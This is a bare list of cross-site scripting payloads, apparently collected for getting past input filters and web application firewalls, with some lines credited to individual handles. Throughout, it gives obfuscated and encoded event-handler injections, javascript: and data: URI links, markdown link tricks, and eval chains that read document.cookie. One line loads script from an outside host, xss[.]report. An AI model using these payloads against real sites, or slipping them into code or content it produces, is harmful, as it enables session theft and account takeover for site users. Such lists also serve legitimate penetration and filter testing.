"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
&lt;img longdesc="src='x'onerror​=alert(document.domain);//&gt;&lt;img " src='showme'&gt;
<svg onload​='setTimeout(function() { alert("1"); }, 100);'>
"/><svg+svg+svg\/\/On+OnLoAd=confirm(1)>
%20%27%3C00%20foo%3D%22%3Ca%2520href%3D%22javascript%3Aalert%28%27XSS-Bypass%27%29%22%3EXSS-CLick%3C%2F00%3E--%2520%2F
 '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/
mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
 onfocus=alert&#x00000000028;1&#x00000000029; autofocus>
"--!><Svg/Onload=confirm`cookie`>"
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(`VulneravelXSS`%26%2300000000000000000041//
"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">
"*prompt(document.domain)*"
xss">x%253Csvg%2520onload=alert%26%230000000040"1")%253E
>><marquee loop=1 width=0 onfinish=alert(1)> -@manjith27945363
ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -@naglinagli
x"><svg%250donload%3D"window%5B%27alert%27%5D(location[%27hostname%27])"
OnXSS=<Img/Src/OnError=alert(1)>
<</div>script</div>>alert()<</div>/script</div>>
<Img Src=OnXSS OnError​=confirm(1)>
‘>alert(154)</script><script/154=’;;;;;;
{alert`1`} 
#"></div><a href= javascript&colon;alert&lpar;document&period;domain)
<script src=https://api.github.com/gist/anything?callback=alert></script>
 '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/
</textarea>a00n<details open="\u0022x="ontoggle="x=atob;z=x('YWxlcnQoJ0EwME4nKQ==');a00n=top;n=`ev`;a00n[n+'al'](z)">
%5Cx6A%5Cx61%5Cx76%5Cx61%5Cx73%5Cx63%5Cx72%5Cx69%5Cx70%5Cx74%5Cx3aalert%281%29  
<%2Fstyle><%2Fscript><script>alert%28"XSS"%29<%2Fscript> 
 javascript%3A%2561lert%281%29 javascript%3A%7B+alert%600%60+%7D 
javascript%3A%2F%2F%250Aalert%281%29 
?msg=%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E, <svg/onload​=alert("XSS") > 

utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e

<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *> 

”/>&_lt;_script>alert(1)&_lt;/script>”/>

<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover​=prompt&#40;1&#41;&#47;&#47;">XYZ</a>

<​script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/<​/script /***/
"><img src="/" =_=" title="onerror='prompt(document.cookie)'">.png
eval('var a=document.createElement(\'script\');a.src=\'https://xss[.]report/c/santiko86); alert("XSSed by santiko1986")');

1'"<S><A HRef=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt; Title=tel:/*%26apos;;/*%26quot;;/*%26lt;s%26gt;%26lt;Img/Src/*/O%26%2378;Error=alert(1)//%26gt;>
"><img src="/" =_=" title="onerror​='prompt(document.cookie)'">.png
ellm1%3cscript%3ealert(1)%3c%2fscript%3ec2xwc
"><iNput///type="password"////id="CF-bypaSS" name="query"////value=""///oNfocUs​="alert('hello')" AutOfoCus="" />
&lt;img longdesc="src='x'onerror​=alert(document.domain);//&gt;&lt;img " src='showme'&gt;
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
<math><x xlink:href=javascript​:confirm`1`>click
<button%20popovertarget=x>Click%20me</button><img%20onbeforetoggle=alert(1)%20popover%20id=x>XSS
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

<svg width="600" height="400" xmlns="http://w3.org/2000/svg" xmlns:xhtml="http://w3.org/1999/xhtml">
 <foreignObject width="100%" height="100%">
 <body xmlns="http://w3.org/1999/xhtml"> <iframe src='javascript​:confirm(10)'></iframe> </body> </foreignObject> </svg>

[a](javascript​:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74​&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
![a'"`onerror=prompt(document.cookie)](x)
[notmalicious](javascript​:window.onerror=alert;throw%20document.cookie)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=)

<​script>a="import\x28"<​/script> <​script>b="`//0-a\x2e"<​/script> <​script>c="nl`\x29"<​/script><​script>d=setTimeout<​/script><​script>e=eval<​/script><​script>f=`${a}${b}${c}`<​/script><​script>d`e\x28f\x29`<​/script>

<​style>@keyframes a{}b{animation:a;}<​/style><b/onanimationstart​=prompt`${document.domain}&#x60;>
<Svg%K9OnLoad=%7Krompt%6K1%6K>
d=document,b='`',d['loca'+'tion']='javascript​&colon;aler'+'t'+b+domain+b
